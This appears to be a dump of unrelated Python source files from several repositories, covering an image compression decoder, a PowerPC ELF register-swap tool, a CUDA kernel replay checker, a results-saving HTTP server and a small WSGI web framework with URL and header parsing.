elif m==2: mv=np.hstack([mv , [0 for i in range(b)]]);print(mv)
else: rebuild=np.hstack([rebuild , [0 for i in range(b)]])
def decode_analyze(c):
global fin,temp
z=True
count=0
#print(c[:30])
while len(c)>0:
if count==64:
#print("EOB")
return c #EOB
r=match(c[0]) #解析bits數
if r==EOB:
#print("EOB")
return c #EOB
#if not r ==-1: print(r)
c.pop(0)
#print(c)
#print('r',r)
if r > 0:
#print(z)
count+=1
decode(''.join(c[:r]),m=z)
c=c[r:]
z=not z
temp=''
return c
def decode_mv(c):
global fin,temp,mv
count=0
while len(c)>0:
if count==2:
#print("EOB")
return c #EOB
r=match(c[0]) #解析bits數
print(r,count)
if r==EOB:
#print("EOB")
return c #EOB
c.pop(0)
if r > 0:
count+=1
decode(''.join(c[:r]),m=2)
c=c[r:]
temp=''
return c
def clear_file():
bin = open("test.bin", "wb")
bin.close()
def write_file(input):
bin = open("test.bin", "ab")
byte = int(input,2).to_bytes((len(input) + 7) // 8, byteorder='big')
bin.write(byte)
bin.close()
def read_file(f_name):
f = open(f_name, "rb")
b=f.read()
b=format(int.from_bytes(b, byteorder='big'),'0'+str(8*len(b))+'b')
print(b[:64])
b=split(str(b))
return b
def main():
global testbks,fin
code_block(testbks)
print('finally:',fin,'\nsize:',len(fin))
clear_file()
write_file(fin)
#print(fin)
b=read_file("test.bin")
#print(b)
#print(' '.join(map(lambda x: '{:08b}'.format(x), b)))
#print(format(int.from_bytes(b, byteorder='big'),'b'))
c = split(b)
decode_analyze(c)
print('Origin :',testbks)
rebuild.resize(64)
print('rebuild:',rebuild.astype(np.int32))
print('Same',np.all(testbks==rebuild))
if __name__ == "__main__":
main()
|
jack04060201/data-compression-practice | decoder.py | import code_t as cd
import DC,numpy as np
import cv2 as cv
size=[int(288/8),int(512/8),2]
frame=np.zeros((288,512,2))
preframe=np.zeros((288,512,2))
p=[0,0]
def decode_bks(s):
global frame,p,size,preframe
bks_count=0
b=cd.read_file(s)
#print(b[:64])
c = cd.split(b)
#print(len(c))
blk=np.zeros((8,8,2))
while len(c)>0:
#if c[0]: print("I-frame")
#else: print("P-frame")
#c.pop(0)
r=0
count=0
while r==0:
#print("block:",count,end='\r',flush=True)
for i in range(2):
blk[:,:,i],c=return_frame(c)
#blk=np.stack((idct, uv), axis=2)
r=rebuild(blk)
count+=1
DC.show(frame,m=1,s=1,sc=2)
#r=cd.decode_mv(c)
#print(r)
reset()
#preframe=frame
def reset():
global frame,p
p=[0,0]
#frame=np.zeros((72,128,2))
def rebuild(blk):
global frame,size,p
#print(p[0],size[0])
if p[0]==size[0]: return 1
#print(blk)
frame[ p[0]*8:(p[0]+1)*8 , p[1]*8:(p[1]+1)*8 ,:]+=blk
p[1]+=1
if p[1] >= size[1]: p[1]=0; p[0]+=1
return 0
def return_frame(c):
pre=len(c)
r=cd.decode_analyze(c)
c = r
c=c[(8-(pre-len(c))%8):]
#print('d',pre-len(c))
cd.rebuild.resize(64)
#print(cd.rebuild)
bks=dezigzag(cd.rebuild,(8,8))
cd.rebuild=np.int32([])
dQa = DC.deQ(bks)
idct =cv.idct(dQa)
return idct,c
def dezigzag(arr,blocksize,func=print):
    N=blocksize[0]  # assumes a square (N x N) block
i,j,d=0,0,False
bks,c=np.zeros(blocksize),0
def set(i,j,c):
bks[i,j]=arr[c]
return c+1
for n in range(N):
c=set(i,j,c)
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
c=set(i,j,c)
if d: i+=1
else: j+=1
d= not d
i+= 1 if d else -1
j+= -1 if d else 1
for n in range(N-2,-1,-1):
c=set(i,j,c)
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
c=set(i,j,c)
if d: j+=1
else: i+=1
d= not d
#print(bks)
return bks
decode_bks("test.bin") |
safariragoli2/python-print | print.py | string = "hi"
print(string)
|
drewkerrigan/basho_bench | priv/results-browser.py | #!/usr/bin/env python
import http.server
import socketserver
import logging
import cgi
import base64
import argparse
import os
class ServerHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
logging.warning("======= GET STARTED =======")
logging.warning(self.headers)
http.server.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
logging.warning("======= POST STARTED =======")
length = self.headers['content-length']
data = self.rfile.read(int(length))
# I don't know wtf is wrong with this handler, it is called twice
# on a page load and only saves one blank canvas and one of the 5 graphs
# (using content length to differentiate the requests for now)
with open(os.path.join("." , "summary_raw_py_" + length + ".txt"), 'wb') as fh:
fh.write(data)
with open(os.path.join("." , "summary_py_" + length + ".png"), 'wb') as fh:
fh.write(base64.b64decode(data.decode()))
self.send_response(200)
def startServer(host, port):
httpd = socketserver.TCPServer((host, port), ServerHandler)
print('Serving at: http://{host}:{port}'.format(host=host, port=port))
httpd.serve_forever()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Results generator')
parser.add_argument('--port', '-p', type=int, help='Port for results generator to bind to', default=8080, required=False)
parser.add_argument('--host', type=str, help='Host for results generator to bind to', default='localhost', required=False)
args = parser.parse_args()
startServer(args.host, args.port)
|
mparisi20/pragma_processor | pragma.py | # pragma.py
# By mparisi20
# github.com/mparisi20/pragma_processor
# #pragma regswap usage:
# #pragma regswap start end regA regB startFile
# start: absolute address of start of affected region (hex)
# end: absolute address of end of affected region (hex)
# regA: register to swap (r0-r31 or f0-f31)
# regB: register to swap (r0-r31 or f0-f31)
# startFile: absolute address of the first function provided by this file (hex)
#pragma iswap addrA addrB startFile
import os
import sys
import argparse
import subprocess
import tempfile
import re
# 10-bit extension field for instructions with opcode 31
op31_map = {
'mask': 0x3ff,
'data':
{
frozenset([0, 32, 4, 86, 470, 54, 278, 246, 1014, 982]): (11, 16),
frozenset([28, 60, 284, 476, 124, 444, 412, 316, 24, 792,
536, 119, 87, 375, 343, 311, 279, 55, 23, 247,
215, 439, 407, 183, 151, 790, 534, 918, 662, 533,
661, 20, 150, 631, 599, 567, 535, 759, 727, 983,
695, 663, 310, 438]): (6, 11, 16),
frozenset([26, 954, 922, 824, 597, 725]): (6, 11),
frozenset([19, 83, 339, 371, 144, 146, 467, 595, 210]): (6,),
frozenset([659, 242]): (6, 16),
frozenset([306]): (16,)
}
}
# lower 9 bits
op31_mask9_map = {
'mask': 0x1ff,
'data':
{
frozenset([266, 10, 138, 491, 459, 75, 11, 235, 40, 8, 136]): (6, 11, 16),
frozenset([234, 202, 104, 232, 200]): (6, 11)
}
}
# 10-bit extension field for instructions with opcode 63
op63_map = {
'mask': 0x3ff,
'data':
{
frozenset([14, 15, 12, 264, 72, 136, 40]): (6, 16),
frozenset([32, 0]): (11, 16),
frozenset([583, 711]): (6,)
}
}
# lower 5 bits
op63_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([21, 18, 20]): (6, 11, 16),
frozenset([25]): (6, 11, 21),
frozenset([26]): (6, 16),
frozenset([23, 29, 28, 31, 30]): (6, 11, 16, 21)
}
}
# lower 5 bits of the 10-bit extension field for instructions with opcode 59
op59_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([21, 18, 20]): (6, 11, 16),
frozenset([25]): (6, 11, 21),
frozenset([24]): (6, 16),
frozenset([29, 28, 31, 30]): (6, 11, 16, 21)
}
}
# 10-bit extension field for instructions with opcode 4
op4_map = {
'mask': 0x3ff,
'data':
{
frozenset([40, 72, 136, 264]): (6, 16),
frozenset([0, 32, 64, 96, 1014]): (11, 16),
frozenset([528, 560, 592, 624]): (6, 11, 16)
}
}
# lower 6 bits
op4_mask6_map = {
'mask': 0x3f,
'data':
{
frozenset([6, 7, 38, 39]): (6, 11, 16)
}
}
# lower 5 bits
op4_mask5_map = {
'mask': 0x1f,
'data':
{
frozenset([18, 20, 21]): (6, 11, 16),
frozenset([23, 28, 29, 30, 31, 10, 11, 14, 15]): (6, 11, 16, 21),
frozenset([24, 26]): (6, 16),
frozenset([25, 12, 13]): (6, 11, 21)
}
}
# 6-bit opcode field for miscellaneous opcodes
misc_opcode_map = {
'mask': 0x3f,
'data':
{
frozenset([14, 12, 13, 15, 7, 8, 28, 29, 24, 25,
26, 27, 20, 21, 34, 35, 42, 43, 40, 41,
32, 33, 38, 39, 44, 45, 36, 37, 46, 47,
50, 51, 48, 49, 54, 55, 52, 53, 56, 57,
60, 61]): (6, 11),
frozenset([11, 10, 3]): (11,),
frozenset([23]): (6, 11, 16)
}
}
class FloatInfo:
def __init__(self, is_float, int_regs):
self.is_float = is_float
self.int_regs = int_regs
class PPCInstr:
INSTR_SIZE = 32
REG_FIELD_SIZE = 5
def __init__(self, val):
self.v = val
def get_field(self, left, right):
return (self.v >> (self.INSTR_SIZE - right - 1)) & ((1 << (right - left + 1)) - 1)
def set_field(self, left, right, val):
width = right - left + 1
mask = (1 << width) - 1
shift = self.INSTR_SIZE - width - left
self.v = self.v & ~(mask << shift) | ((val & mask) << shift)
def get_opcode(self):
return self.get_field(0, 5)
def get_ext_opcode(self):
return self.get_field(21, 30)
def search_opcode_maps(self, opcode, *maps):
for map in maps:
masked_opcode = opcode & map['mask']
for k in map['data'].keys():
if masked_opcode in k:
return map['data'][k]
# returns a tuple containing the bit position of each register field
# or None if the instruction does not use registers
def get_reg_fields(self):
opcode = self.get_opcode()
ext_opcode = self.get_ext_opcode()
if opcode == 31:
return self.search_opcode_maps(ext_opcode, op31_map, op31_mask9_map)
elif opcode == 59:
return self.search_opcode_maps(ext_opcode, op59_mask5_map)
elif opcode == 63:
return self.search_opcode_maps(ext_opcode, op63_map, op63_mask5_map)
elif opcode == 4:
return self.search_opcode_maps(ext_opcode, op4_map, op4_mask6_map, op4_mask5_map)
else:
return self.search_opcode_maps(opcode, misc_opcode_map)
def uses_float_regs(self):
op = self.get_opcode()
ext_op = self.get_ext_opcode()
if op in {48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 60, 61}:
return FloatInfo(True, (11,))
elif (op == 4 and ext_op & 0x3F in {6, 7, 38, 39}) or (op == 31 and ext_op in {535, 567, 599, 631, 663, 695, 727, 759, 983}):
return FloatInfo(True, (11, 16))
elif op in {4, 59, 63}:
return FloatInfo(True, ())
return FloatInfo(False, ())
# edit the PPC instruction to swap the registers
def swap_registers(self, regA, regB):
info = self.uses_float_regs()
reg_fields = self.get_reg_fields()
if not reg_fields:
return
for left in reg_fields:
right = left + self.REG_FIELD_SIZE - 1
currReg = self.get_field(left, right)
# since r0-r31 occupy 0-31 and f0-31 occupy 32-63,
# subtract 32 from regA/regB if the next register field is for a floating point register
dec = 0 if not info.is_float or left in info.int_regs else -32
if currReg == regA + dec:
self.set_field(left, right, regB + dec)
elif currReg == regB + dec:
self.set_field(left, right, regA + dec)
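# Hedged illustration (added; not part of the original script). Sanity check of
# the bit-field helpers above, using the PowerPC convention that bit 0 is the
# MSB. 0x38610008 encodes `addi r3, r1, 8` (opcode 14, rD=3, rA=1, simm=8).
_demo = PPCInstr(0x38610008)
assert _demo.get_opcode() == 14
assert _demo.get_field(6, 10) == 3   # rD
assert _demo.get_field(11, 15) == 1  # rA
_demo.swap_registers(1, 2)           # swap r1 <-> r2
assert _demo.get_field(11, 15) == 2  # rA is now r2; rD (r3) untouched
del _demo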
parser = argparse.ArgumentParser()
parser.add_argument("cc",
help="path to a C/C++ compiler")
parser.add_argument("cflags",
help="all flags and options to be invoked with cc")
parser.add_argument("output",
help="path to the outputted object file")
parser.add_argument("source",
help="path to the C/C++ source file")
args = parser.parse_args()
def parse_reg(str):
if str[0] == 'r' or str[0] == 'f':
reg = int(str[1:])
if reg >= 0 and reg <= 31:
return reg if str[0] == 'r' else reg + 32
raise ValueError("Failed to parse register argument (can be r0...r31 or f0...f31)")
class RegswapTask:
def __init__(self, start, end, regA, regB):
self.start = start # .text section byte offset
self.end = end # .text section byte offset
self.regA = regA
self.regB = regB
class IswapTask:
def __init__(self, src, dst):
self.src = src # .text section byte offset
self.dst = dst # .text section byte offset
regswap_tasks = []
iswap_tasks = []
with open(args.source, "r") as src:
regswap_pattern = re.compile("[ \t]*#pragma[ \t]+regswap[ \t]+")
iswap_pattern = re.compile("[ \t]*#pragma[ \t]+iswap[ \t]+")
for line in src:
if regswap_pattern.match(line):
params = line.split()[2:]
if len(params) != 5:
raise ValueError("ERROR: " + str(len(params)) + " arguments passed to #pragma regswap (expected 5)")
start = int(params[0], base=16)
end = int(params[1], base=16)
regA = parse_reg(params[2])
regB = parse_reg(params[3])
start_file = int(params[4], base=16)
if not (start % 4 == 0 and end % 4 == 0 and start_file % 4 == 0):
raise ValueError("Invalid start, end, or start_file arguments (should have 4 byte aligment)")
if not (start >= start_file and end > start):
raise ValueError("Invalid start, end, or start_file arguments (end must be > start, and start >= start_file)")
regswap_tasks.append(RegswapTask(start-start_file, end-start_file, regA, regB))
elif iswap_pattern.match(line):
params = line.split()[2:]
if len(params) != 3:
raise ValueError("ERROR: " + str(len(params)) + " arguments passed to #pragma iswap (expected 3)")
src = int(params[0], base=16)
dst = int(params[1], base=16)
start_file = int(params[2], base=16)
if not (src % 4 == 0 and dst % 4 == 0 and start_file % 4 == 0):
raise ValueError("Invalid src, dst, or start_file arguments (should have 4 byte aligment)")
if not (src >= start_file and dst > src):
raise ValueError("Invalid src, dst, or start_file arguments (dst must be > src, and src >= start_file)")
iswap_tasks.append(IswapTask(src-start_file, dst-start_file))
subprocess.run([*args.cc.strip().split(' '), *args.cflags.split(' '), "-o", args.output, args.source])
instrs = []
TEXT_INDEX = 1 # NOTE: assumes that mwcceppc always places the .text section header at index 1
SHDR_32_SIZE = 40 # size of an Elf32_Shdr object
if regswap_tasks or iswap_tasks:
with open(args.output, "rb") as f:
if f.read(7) != b'\x7FELF\x01\x02\x01':
raise ValueError("compiler output is not an current version ELF file for a 32-bit big endian architecture")
f.seek(0x20)
e_shoff = int.from_bytes(f.read(4), byteorder='big')
f.seek(0x30)
e_shnum = int.from_bytes(f.read(2), byteorder='big')
if e_shoff == 0 or e_shnum < 2:
raise ValueError("ELF file must contain at least two sections")
# get .text section sh_offset and sh_size members
f.seek(e_shoff + TEXT_INDEX*SHDR_32_SIZE + 0x10)
text_offset = int.from_bytes(f.read(4), byteorder='big')
text_size = int.from_bytes(f.read(4), byteorder='big')
# read .text section contents into buffer
f.seek(text_offset)
for i in range(text_size // 4):
instrs.append(PPCInstr(int.from_bytes(f.read(4), byteorder='big')))
# perform regswap tasks
for task in regswap_tasks:
if task.end > text_size:
raise ValueError("End address " + (task.end + start_file) + " is past the end of the ELF file's .text section")
for i in range(task.start // 4, task.end // 4):
instrs[i].swap_registers(task.regA, task.regB)
# perform iswap tasks
for task in iswap_tasks:
if task.dst > text_size:
raise ValueError("End address " + (task.dst + start_file) + " is past the end of the ELF file's .text section")
a = task.src // 4
b = task.dst // 4
instrs[a], instrs[b] = instrs[b], instrs[a]
# write patched .text section back to the ELF
with open(args.output, "rb+") as f:
f.seek(text_offset)
for instr in instrs:
f.write(instr.v.to_bytes(4, byteorder='big'))
|
Massendefekt/ZLUDA | zluda_dump/src/replay.py | <reponame>Massendefekt/ZLUDA<filename>zluda_dump/src/replay.py
import pycuda.autoinit
import pycuda.driver as drv
import pycuda.tools as py_tools
from pathlib import PurePath
import numpy as np
from os import path
import os
import itertools
import sys
# It's impossible to discern what is the type of a buffer, here you can override equality checks
def assert_array_equal_override(kernel_name, idx, arr1, arr2):
if kernel_name == 'knn_match' and idx == 6:
arr1_view = np.frombuffer(arr1, dtype=np.dtype([('f1', np.uint32), ('f2', np.uint32), ('f3', np.uint32)]))
np.ndarray.sort(arr1_view)
arr2_view = np.frombuffer(arr2, dtype=np.dtype([('f1', np.uint32), ('f2', np.uint32), ('f3', np.uint32)]))
np.ndarray.sort(arr2_view)
if kernel_name == 'nonmax_suppression' and idx == 7:
arr1_view = np.frombuffer(arr1, dtype=np.dtype(np.uint32))
np.ndarray.sort(arr1_view)
arr2_view = np.frombuffer(arr2, dtype=np.dtype(np.uint32))
np.ndarray.sort(arr2_view)
np.testing.assert_array_equal(arr1, arr2)
def load_arguments(arg_path):
is_buffer = arg_path.endswith(".buffer")
with open(arg_path, "rb") as f:
arg_bytes = f.read()
if not is_buffer:
if len(arg_bytes) == 1:
return np.frombuffer(arg_bytes, dtype=np.uint8)[0], None
elif len(arg_bytes) == 2:
return np.frombuffer(arg_bytes, dtype=np.uint16)[0], None
elif len(arg_bytes) == 4:
return np.frombuffer(arg_bytes, dtype=np.uint32)[0], None
elif len(arg_bytes) == 8:
return np.frombuffer(arg_bytes, dtype=np.uint64)[0], None
else:
raise Exception('Incorrect size of {}: {}'.format(arg_path, len(arg_bytes)))
else:
buff = np.frombuffer(bytearray(arg_bytes), dtype=np.uint8)
buff.setflags(write=1, align=1)
return drv.InOut(buff), buff
def parse_arguments(dump_path, prefix):
dir = path.join(dump_path, prefix)
arg_files = os.listdir(dir)
return [load_arguments(path.join(dir, f)) for f in sorted(arg_files)]
def append_debug_buffer(args):
args = list(args)
debug_buff = np.zeros(1024 * 1024, np.single)
args.append((drv.InOut(debug_buff), debug_buff))
return args
def verify_single_dump(input_path, max_block_threads):
print(input_path)
kernel_name = path.basename(input_path).split("_", 1)[1]
with open(path.join(input_path, "launch.txt"), "r") as launch_f:
launch_lines = list(map(int, launch_f.readlines()))
block = tuple(launch_lines[3:6])
launch_block_size = block[0] * block[1] * block[2]
if launch_block_size > max_block_threads:
print(
f" Skipping, launch block size ({launch_block_size}) bigger than maximum block size ({max_block_threads})")
return
module = drv.module_from_file(path.join(input_path, "module.ptx"))
kernel = module.get_function(kernel_name)
pre_args = append_debug_buffer(parse_arguments(input_path, "pre"))
kernel_pre_args, host_pre_args = zip(*pre_args)
kernel(*list(kernel_pre_args), grid=tuple(launch_lines[:3]), block=block, shared=launch_lines[6])
post_args = parse_arguments(input_path, "post")
_, host_post_args_args = zip(*post_args)
for idx, (pre_arg, post_arg) in enumerate(zip(host_pre_args, host_post_args_args)):
if pre_arg is None:
continue
try:
assert_array_equal_override(kernel_name, idx, pre_arg, post_arg)
except Exception as e:
print(f"{idx}: {e}")
def main(argv):
device = drv.Device(0)
max_threads = device.get_attribute(drv.device_attribute.MAX_THREADS_PER_BLOCK)
print(device.name())
input_path = argv[1]
if os.path.exists(path.join(input_path, "launch.txt")):
verify_single_dump(input_path, max_threads)
else:
for input_subdir in sorted([path.join(input_path, dir_name) for dir_name in os.listdir(input_path)]):
verify_single_dump(input_subdir, max_threads)
if __name__ == "__main__":
main(sys.argv)
|
zhaoy17/pyweb | pyweb/routing/router.py | <reponame>zhaoy17/pyweb<filename>pyweb/routing/router.py
from ..http import httpRequest
class Router:
def __init__(self, root_object):
self.root_object = root_object
self.has_arg = None
def _find_object(self, object_location):
curr = self.root_object
for i in range(len(object_location)):
if i < len(object_location) - 1:
try:
curr = getattr(curr, object_location[i])
except AttributeError:
raise ValueError("Resource cannot be located")
else:
try:
curr = getattr(curr, object_location[i])
if not hasattr(curr, "__call__"):
raise ValueError("Resource cannot be located")
self.has_arg = False
return curr
except AttributeError:
self.has_arg = True
return curr
def execute_request(self, request: httpRequest) -> dict:
target = self._find_object(request.object_location)
        if self.has_arg:
func = getattr(target, "do_" + request.method.lower())
return func(request.object_location[-1], request.query_string)
else:
return target()
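# Hedged usage sketch (added; not in the original module; names are
# illustrative). A request for /users/list resolves attribute-by-attribute
# from the root object:
#   class Users:
#       def list(self):
#           return {"users": []}
#   class Root:
#       users = Users()
#   Router(Root())  # /users/list -> Root().users.list()
# If the final path segment is not an attribute, it is treated as an argument
# and dispatched to do_<method>(segment, query_string) on the parent object.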
|
zhaoy17/pyweb | pyweb/http/header.py | <reponame>zhaoy17/pyweb
"""
This module consists of functions that are used to parse multipart and discrete
MIME header.
"""
from abc import ABC, abstractmethod
import json
__all__ = [
"ContentType",
"Header",
"HTTPBody"
]
class Header(ABC):
@abstractmethod
def to_str(self) -> str:
pass
@abstractmethod
def to_dict(self) -> dict:
pass
@abstractmethod
def __bool__(self):
pass
@abstractmethod
def to_header(self) -> str:
pass
@abstractmethod
def to_list(self) -> list:
pass
class ContentType(Header):
class Handler(ABC):
@abstractmethod
def parse(self):
pass
@staticmethod
@abstractmethod
def content_type() -> list:
pass
class JSONHandler(Handler):
def __init__(self, raw_string: str):
self._str = raw_string
self._dict = None
def to_str(self) -> str:
return self._str
def parse(self) -> dict:
if self._dict is None:
self._dict = json.loads(self._str)
return self._dict
@staticmethod
def content_type() -> list:
return ["application/json"]
_HandlerMap = {"application/json": JSONHandler}
def __init__(self, raw_header):
self._raw = raw_header
self._str = None
self._dict = None
self._bool = None
self._list = None
def to_header(self):
return self._raw
def to_str(self) -> str:
if not self:
return ""
if self._str is None:
self._str = self._raw.split(";")[0]
return self._str
def to_dict(self) -> dict:
if not self:
return {}
if self._dict is None:
if self._list is None:
                self._list = self._parse_content_type(self._raw)
content = self._list[0]
params = self._list[1]
params["type"] = content
self._dict = params
return self._dict
def __bool__(self):
return self._str != ""
def to_list(self):
if not self:
return None
if self._dict is None:
self.to_dict()
return self._dict.keys()
@classmethod
def from_dict(cls, content_type: dict):
charset = "utf-8"
if "charset" in content_type:
charset = content_type["charset"]
raw_header = content_type["type"] + "; " + charset
for key in content_type:
if key != "charset":
raw_header += "; " + content_type[key]
return cls(raw_header)
def get_handler(self, raw_string: str) -> Handler:
content_type = self.to_str()
try:
return ContentType._HandlerMap[content_type](raw_string)
except KeyError:
raise ValueError("Header type not supported")
@staticmethod
def add_handler(handler: Handler):
for _t in handler.content_type():
ContentType._HandlerMap[_t] = handler
@staticmethod
def _parse_content_type(line: str) -> list:
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
if line == "":
return ["", {}]
parts = line.split(";")
file_type_header = parts[0].lower().strip()
content = file_type_header
params = {}
if len(parts) > 1:
for i in range(1, len(parts)):
kv = parts[i].split("=")
if len(kv) != 2:
raise ValueError("content-type header is not formatted correctly")
else:
params[kv[0].strip()] = kv[1].strip()
return [content, params]
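# Hedged usage sketch (added; not in the original module):
#   ct = ContentType("application/json; charset=utf-8")
#   ct.to_str()   -> 'application/json'
#   ct.to_dict()  -> {'charset': 'utf-8', 'type': 'application/json'}
#   ct.get_handler('{"a": 1}').parse() -> {'a': 1}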
class HTTPBody:
def __init__(self, stream, content_type: ContentType, content_length: int):
self._content_type = content_type
self._input = stream
try:
self._encoding = content_type.to_dict()["charset"]
except KeyError:
self._encoding = "utf-8"
self._handler = None
self._data = None
self._str = None
self._output = None
self._size = content_length
def get_bytes(self):
if self._data is None:
self._data = self._input.read(self._size)
return self._data
def get_str(self):
if self._str is None:
self._str = self.get_bytes().decode(self._encoding)
return self._str
def parse_content(self):
if self._output is None:
if self._handler is None:
self._handler = self._content_type.get_handler(self.get_str())
self._output = self._handler.parse()
return self._output
|
zhaoy17/pyweb | pyweb/http/_url.py | <filename>pyweb/http/_url.py
"""
This module provides utilities for parsing url string. Most of the implementation is based
on Python's urllib module with some slight modification. The incoming url is processed as
str, while the url consists in the outgoing url request will be processed using ASCII bytearray
"""
import re
from typing import Union
__all__ = [
'to_string',
'to_byte_array',
'parse_query_string',
'decode',
'encode',
'parse_host',
'parse_path_info'
]
# reserved and unreserved chracter defined under the RFC 3986 (STD66): "Uniform Resource Identifiers" by <NAME>,
# <NAME> and L. Masinter, January 2005.
_ALPHA = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
_DIGIT = frozenset(b"0123456789")
_GEN_DELIMS = frozenset(b":/?#[]@")
_SUB_DELIMS = frozenset(b"!$&'()*+,;=")
_UNRESERVED = _ALPHA | _DIGIT | frozenset(b"-._~")
_RESERVED = _GEN_DELIMS | _SUB_DELIMS
_reg_hex = None
_reg_host = None
# lookup tables
_BYTE2HEX = {}
_HEX2BYTE = {}
def _urldecode(string: str) -> str:
"""
convert an % + hexadecimal representation encoding into the its original character
:param string: a % + hexadecimal encoded string
:return: the original character
"""
global _HEX2BYTE
if str == "+":
return " "
string = string.lstrip('%')
try:
return _HEX2BYTE[string]
except KeyError:
_HEX2BYTE[string] = chr(int(string, 16))
return _urldecode(string)
def _urlencode(char: int) -> bytearray:
"""
convert an unsafe character into % + hexadecimal representation of that character
:param char: a character represented as an int
:return: % + hexadecimal representation of the character if the character is
not safe
"""
global _BYTE2HEX
if char not in _UNRESERVED:
try:
return _BYTE2HEX[char]
except KeyError:
_BYTE2HEX[char] = to_byte_array('%{:02X}'.format(char))
return _urlencode(char)
else:
return bytearray([char])
def to_byte_array(string: str) -> bytearray:
"""
convert a string into a byte list. Skip all characters that are not in the range
of ISO/IEC 8859-1 character set to avoid undefined behavior
    According to PEP3333, "native" strings (which are always implemented using the type named str)
    are used for request/response headers and metadata. The content of native strings
    must be translatable to bytes via the Latin-1 encoding. HTTP does not support unicode.
"""
byte_array = bytearray()
for char in string:
if ord(char) >= 256:
continue
else:
byte_array.append(ord(char))
return byte_array
def to_string(byte_array: Union[bytes, bytearray]) -> str:
"""
convert a byte array into string
:param byte_array: a latin1 encoded byte array
:return: a decoded string
"""
string = []
for byte in byte_array:
string.append(chr(byte))
return "".join(string)
def encode(url: Union[str, bytes, bytearray]) -> bytearray:
"""
Encode all characters in an url that does not belong to unreserved set of character into
%hex representation of that character.
:param url: a url byte array
:return: url with unsafe character encoded using % + hex(chr)
"""
if isinstance(url, str):
url = to_byte_array(url)
return bytearray(b''.join([_urlencode(char) for char in url]))
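# Illustrative sketch (not part of the original module): unreserved characters
# pass through, everything else is percent-encoded:
#     encode("a b/c") -> bytearray(b'a%20b%2Fc')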
def decode(string: Union[str, bytes, bytearray]) -> str:
"""
decode a % encoded url into its original form
:param string: a % encoded url string
:return: unencoded url string
"""
    if isinstance(string, (bytes, bytearray)):
string = to_string(string)
if "%" not in string and "+" not in string:
return string
else:
global _reg_hex
if _reg_hex is None:
_reg_hex = re.compile("(%[0-f][0-f])")
string_list = _reg_hex.split(string)
for index, item in enumerate(string_list):
if len(item) > 0 and item[0] == "%":
string_list[index] = _urldecode(item)
return ''.join(string_list)
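# Illustrative sketch (not part of the original module):
#     decode("a%20b%2Fc") -> "a b/c"
# Strings containing neither "%" nor "+" are returned unchanged.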
def parse_query_string(query: str) -> dict:
"""
parse a query string portion of an url (the part after "?") into a key-value pairs,
skip empty query string
:param query: a raw query string
:return: key-value pairs with parameter and its value
"""
pairs = query.split("&")
kv = {}
for item in pairs:
key_value = item.split("=")
# skip empty query string
if len(key_value) == 1:
continue
elif len(key_value) != 2:
raise ValueError("bad query field: {}".format(key_value))
kv[decode(key_value[0].strip())] = decode(key_value[1].strip())
return kv
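# Illustrative sketch (not part of the original module):
#     parse_query_string("id=42&q=two%20words") -> {'id': '42', 'q': 'two words'}
# A dangling key with no "=" (e.g. "flag") is skipped rather than raising.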
def parse_path_info(string: str) -> list:
"""
parse the path info, which will be used to find modules requested by the url
:param string: the path info string
:return: a list of directory split by "/"
"""
string = decode(string.lstrip("/"))
return string.split("/")
def parse_host(host: str) -> tuple:
"""
Implementation comes from urllib. Parse a canonical 'host:port' string into parts.
Parse a host string (which may or may not contain a port) into
parts, taking into account that the string may contain
either a domain name or an IP address. In the latter case,
both IPv4 and IPv6 addresses are supported.
:param host: the content of the host header
:return: host name and port number
"""
global _reg_host
if _reg_host is None:
_reg_host = re.compile("(.*):([0-9]*)", re.DOTALL)
match = _reg_host.fullmatch(host)
if match:
host, port = match.groups()
if port:
return host, int(port)
return host, None
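# Illustrative sketch (not part of the original module):
#     parse_host("example.com:8080") -> ('example.com', 8080)
#     parse_host("example.com")      -> ('example.com', None)
#     parse_host("[::1]:443")        -> ('[::1]', 443)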
|
zhaoy17/pyweb | pyweb/http/httpRequest.py | <filename>pyweb/http/httpRequest.py
from ._url import parse_query_string, parse_host, parse_path_info, decode
from .header import ContentType, HTTPBody
class BaseRequest:
def __init__(self, environ):
self._env = environ
self._method = environ["REQUEST_METHOD"]
try:
self._pathinfo = environ["PATH_INFO"]
except KeyError:
self._pathinfo = "/"
self._wsgi_error = environ["wsgi.errors"]
self._stream = environ["wsgi.input"]
self._host = None
self._port = None
self._path = None
self._content_type = None
self._query_string = None
@property
def method(self):
return self._method
@property
def port(self):
"""
        infer the port number of the request; HTTP_HOST should be preferred over
        the SERVER_NAME and SERVER_PORT variables according to PEP3333
:return: the port number of the request as int
"""
        if self._port is None:
            try:
                host, port = parse_host(self._env['HTTP_HOST'])
                self._host = host
                if port is None:
                    self._port = 443 if self._env['wsgi.url_scheme'] == 'https' else 80
                else:
                    self._port = port
            except KeyError:
                self._host = self._env['SERVER_NAME']
                self._port = int(self._env['SERVER_PORT'])
        return self._port
@property
def host(self) -> str:
if self._host is None:
            _ = self.port  # evaluating the port property also parses and caches the host
return self._host
@property
def path(self) -> list:
if self._path is None:
self._path = parse_path_info(self._pathinfo)
return self._path
@property
def query_string(self) -> dict:
if self._query_string is None:
try:
raw_string = self._env["QUERY_STRING"] \
.encode("latin1").decode("utf-8", "replace")
except KeyError:
raw_string = ""
self._query_string = parse_query_string(raw_string)
return self._query_string
@property
def content_type(self) -> ContentType:
if self.method == "GET":
return ContentType("")
if self._content_type is None:
try:
header = decode(self._env["CONTENT_TYPE"]
.encode("latin1").decode("utf-8", "replace"))
except KeyError:
header = ""
self._content_type = ContentType(header)
return self._content_type
@property
def content_length(self) -> int:
        try:
            return int(self._env['CONTENT_LENGTH'])
        except (KeyError, ValueError):
            return 0
@property
def message_body(self) -> HTTPBody:
return HTTPBody(self._stream, self.content_type, self.content_length)
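# Illustrative usage sketch (hypothetical environ values; not part of the original module):
#     import io, sys
#     env = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/api/items',
#            'QUERY_STRING': 'id=42', 'HTTP_HOST': 'example.com:8080',
#            'wsgi.url_scheme': 'http', 'wsgi.errors': sys.stderr,
#            'wsgi.input': io.BytesIO(b'')}
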